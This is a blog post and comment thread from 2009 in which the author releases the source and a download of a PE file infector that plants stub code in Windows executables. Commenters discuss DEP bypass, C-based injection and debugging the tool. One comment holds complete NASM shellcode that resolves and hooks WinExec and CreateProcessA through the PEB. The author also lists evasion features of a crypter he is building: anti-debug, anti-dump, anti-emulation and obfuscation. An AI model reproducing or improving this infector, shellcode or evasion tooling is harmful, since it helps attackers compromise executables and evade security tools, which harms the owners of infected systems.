Ok so I spent the last few days revising my PE infecter code.
I’ve uploaded the revised source code along with a release build.
Many improvements have been made, I’m sure you’ll spot a few once you glance over the source code.
Below is a quote of the usage output:
PE File Infecter By KOrUPt @ KOrUPt.co.uk
Usage: KInfect2.exe <stub file> <target file> <infection method>Infection methods:
’s’ – Use code section slack space(stealthy but volatile)
‘e’ – Expand last section(less stealthy and volatile)
‘n’ – Append a new section(least stealthy but less volatile)
I’ll add more infection methods at a later date. Of course you’re welcome to add some yourself, adding an a new entry to the import table would be a nice exercise(I’ve purposely left room for improvement).
If you do feel like improving it consider posting a link to the revised code as a comment.
Let know what you think.
Download link:
korupt.co.uk/KInfect2.rar
KOrUPt.
I’m not quite sure what you mean Meh. Care to define ‘tarp’?
KOrUPt.
Comment by KOrUPt — January 7, 2009 @ 22:17
http://www.itsatarp.com/
know your meme(aka less datarescue software,more procrastination) the Rs are wild in internet lingo, they eat Es at the end of words, like twitr, flickr, .. and the keep dancing with vowels in the middle of words, like pr0n and tarp.
I was hinting at the fact that melted was probably going to propose making you an accessory to breaking computer crime laws, for a nominal fee. Mainly for comical effect(the meme bit), and because it’s true.
This concludes our OT lesson for today. Feel free to remove my contributions from this post.
Comment by meh — January 8, 2009 @ 02:26
Meh, I wanted to see what he intended to propose. I don’t take on much freelancing jobs. And when I do it’s only from sources that I can trust
.
Either way, thanks for the heads up.
KOrUPt.
Comment by KOrUPt — January 8, 2009 @ 10:32
This is nice, but the problem is how to bypass Windows Data Execution Prevention DEP with this technique. Any suggestions ? Or maybe you want to share NASM code which is able to do that ?
Comment by algla991 — January 22, 2009 @ 17:29
I have tried the following but it does not work:
BITS 32 ; 32bit
section .text
global START
global RESETEXPORTNAMETABLE
global INITSTRINGTABLE
global MOVETHROUGHTABLE
global STRINGSEARCH
global Found
global DONESTRINGSEARCH
global OverWriteCreateProcessA
global OverWriteWinExec
global CallWinExec
global NOTFOUND
global STRINGEXIT
global JUMPSTART
global WINEXEC
global CREATEPROCESSA
global ENDOFTABLE
global WinExecOverWrite
global CreateProcessAOverWrite
global COMMAND
global EXIT
pusha
jmp JUMPSTART
START:
pop ebp
xor eax, eax
mov al, 0×30
mov eax, [fs:eax];
mov eax, [eax+0xc];
mov eax, [eax+0x1c]
mov eax, [eax]
mov eax, [eax+0x8]
movzx ebx, word [eax+3ch]
mov esi, [eax+ebx+78h]
lea esi, [eax+esi+18h]
mov ebx, eax
lodsd
mov ecx, eax
lodsd
add eax,ebx
mov edx,eax
lodsd
add eax,ebx
push ecx
push edx
RESETEXPORTNAMETABLE:
xor edx, edx
INITSTRINGTABLE:
mov esi, ebp
inc esi
MOVETHROUGHTABLE:
mov edi, [eax+edx*4]
add edi, ebx
xor ecx, ecx
mov cl, BYTE [ebp]
test cl, cl
jz DONESTRINGSEARCH
STRINGSEARCH:
repe cmpsb
je Found
cmp [esp+4], edx
je NOTFOUND
inc edx
jmp INITSTRINGTABLE
Found:
pop ecx
shl edx, 2
add edx, ecx
mov edi, [edx]
add edi, ebx
push edi
push ecx
xor ecx, ecx
mov cl, BYTE [ebp]
inc ecx
add ebp, ecx
jmp RESETEXPORTNAMETABLE
DONESTRINGSEARCH:
OverWriteCreateProcessA:
pop edi
pop edi
push 0×06
pop ecx
inc esi
rep movsb
OverWriteWinExec:
pop edi
push edi
push 0×06
pop ecx
inc esi
rep movsb
CallWinExec:
push 0×03
push esi
call [esp+8]
NOTFOUND:
pop edx
STRINGEXIT:
pop ecx
popa;
jmp EXIT
JUMPSTART:
add esp, 0×1000
call START
WINEXEC:
DB 0×07
DB ‘W’
DB ‘i’
DB ‘n’
DB ‘E’
DB ‘x’
DB ‘e’
DB ‘c’
CREATEPROCESSA:
DB 0×0e
DB ‘C’
DB ‘r’
DB ‘e’
DB ‘a’
DB ‘t’
DB ‘e’
DB ‘P’
DB ‘r’
DB ‘o’
DB ‘c’
DB ‘e’
DB ’s’
DB ’s’
DB ‘A’
ENDOFTABLE:
DB 0×00
WinExecOverWrite:
DB 0×06
DB 0×55
DB 0×8b
DB 0xec
DB 0×83
DB 0xec
DB 0×54
CreateProcessAOverWrite:
DB 0×06
DB 0×55
DB 0×8b
DB 0xec
DB 0xff
DB 0×75
DB 0×2c
COMMAND:
DB ‘c’
DB ‘a’
DB ‘l’
DB ‘c’
DB ‘.’
DB ‘e’
DB ‘x’
DB ‘e’
DB 0×00
EXIT:
DB 0×90
DB 0×90
Any suggestions ?
Comment by algla991 — January 22, 2009 @ 18:17
My knowledge of DEP is rather limited…
But I don’t see how DEP will be much of a problem in this case. You should be able to change the characteristics of a section to make it executable, or alternately you can just use slack space from within the code section(which already has the executable bit set).
I assume you don’t intend to execute your code on the stack or heap.
Perhaps custom exception handlers may help?
In future please be more specific, comments such as “…it does not work”, as I’m sure you can understand, doesn’t provide me with a very good outline of how it is supposed to work or what currently doesn’t work.
KOrUPt.
Comment by KOrUPt — January 23, 2009 @ 04:18
it is very nice but how can inject c code your code inject only asm code but i don’t know well asm so please replay me injection with c code
Comment by ted — March 3, 2009 @ 09:52
Amazing. Provide the techniques, still there has to be one that wants it spoonfed.. May as well get them to send you any resources they want included, a ‘to do’ list which contains only what they want out of the program, and then write it for them…. :O
Keep up the good work K.
Comment by Ghandi — May 20, 2009 @ 23:43
Ghandi, well said.
Nice to see you around by the way. I apoligise for the late approval of your comment, I’ve recently switched to another box and I didn’t have the Admin CP password stored locally.
Ted, you can write an C Inline assembly buffer if you like, or just write in C routines(see my initial infecter) but note that the C routines must be relocatable and independent(you can’t use API’s). I recommend you learn NASM.
You may be wondering I chose to create the stub in NASM and not use an Inline assembly buffer like I did initially? The answer is simple, extended flexibility… Instead of having to re-compile the whole infecter when I apply a minor update to the stub, I need just simply re-compile the stub and it can be easily updated by myself and others. The actual infecter only needs to be re-compiled should I make a major change to the stub that would require certain table’s to be initialized(I.E ImageBase may need to be hardcoded into stub).
I may release an updated version of this Infecter sometime this month, as I’m working on a PE protector at the time of writing.
Currently the progress list stands as follows(currently in alpha):
;——————————————————————-
; KCrypter Stub V1.0 by (C) KOrUPt @ http://KOrUPt.co.uk.
; This stub is part of the KCrypter project and is not to be re-distributed
; without the authors prior permission…
;
; If you don’t know what you’re doing do not attempt to modify this stub!
;
; Done:
; TLS table support.
; IAT rebuilding.
; IAT redirection.
; Internal API resolution.
; Anti-Emulation.
; Anti-Dump.
; Anti-debug.
; Junk code obfuscation.
;
; Todo:
; Implement API emulation.
; Implement on-demand decryption(guard pages)
; Implement code section encryption in KCrpyter(Arc4)
; Implement red-pill anti emu.
;
; Please send any suggestions and or death threats to: [my email address]
; — compile with nasm.exe stub.asm
;——————————————————————-
If you’ve anything to add, please let me know.
Apologies for the lack of new posts, I’m very very busy trying to juggle around various projects and real life priorities at the moment.
Nice to see a few of you still drop by
.
KOrUPt.
Comment by KOrUPt — May 28, 2009 @ 04:01
Hello KOrUPt, i have a boring simple PEex for you to debug!(when you have time) find the errors in this file, the game, get the file to execute, work out the hidden code & see if you can find an exploit in the ORIGIONAL code!!
Should take a few mins
Hint:rpc:
http://www.megaupload.com/?d=7OG3THT7
Comment by melwtec35 — May 29, 2009 @ 02:18
Hello, can you please post some more information on this topic? I would like to read more.
Comment by GarykPatton — June 16, 2009 @ 01:43
Hey Korupt, I was examining the source and im a little confused on something… InfectionHelper.cpp line 168: Wouldnt using GetFileSize on the handle from CreateFile return the original size of the file? therefore, writing to GetFileSize – dwStubSize would be overwriting part of the original PE file wouldnt it?
Comment by C++Noob — August 15, 2009 @ 07:55
Gary, what kind of further information are you looking for? Please be specific. Thanks in advance.
Now, C++Noob…
Take note of the call to UnloadFile() and the following LoadFile() call just after, the file is first unloaded an then re-mapped into memory in the expanded form…
lpMapInfo = LoadFile(target, dwStubSize);
This line appends dwStubSize bytes to the file and maps it into memory.
dwWriteOffset = (GetFileSize(lpMapInfo->hFile, NULL)) – dwStubSize;
This line acquires the length of the file including the newly appended null bytes and subtracts the size of the stub in bytes to make sure there’s enough room to place the stub into the file.
I hope this helps to clarify the issue, if not, please let me know.
Apologies for late approval of comments.
KOrUPt.
Comment by KOrUPt — August 15, 2009 @ 17:07
KOrUPt thanks for sharing it with us.
I need your help though; I tried to infect a packed exe with UPX, and now it does not start at all. It says “Error executing program”. Do you have any idea why ?
Thanks in advance.
Comment by Bill — February 5, 2010 @ 15:26